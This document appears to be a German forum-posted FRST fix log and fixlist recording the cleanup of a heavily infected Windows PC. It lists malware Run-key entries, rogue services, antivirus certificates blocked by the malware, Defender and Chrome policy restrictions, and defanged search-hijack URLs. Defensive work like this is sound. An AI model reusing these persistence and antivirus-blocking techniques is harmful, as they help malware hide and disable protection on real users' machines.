Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
FRST:
Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
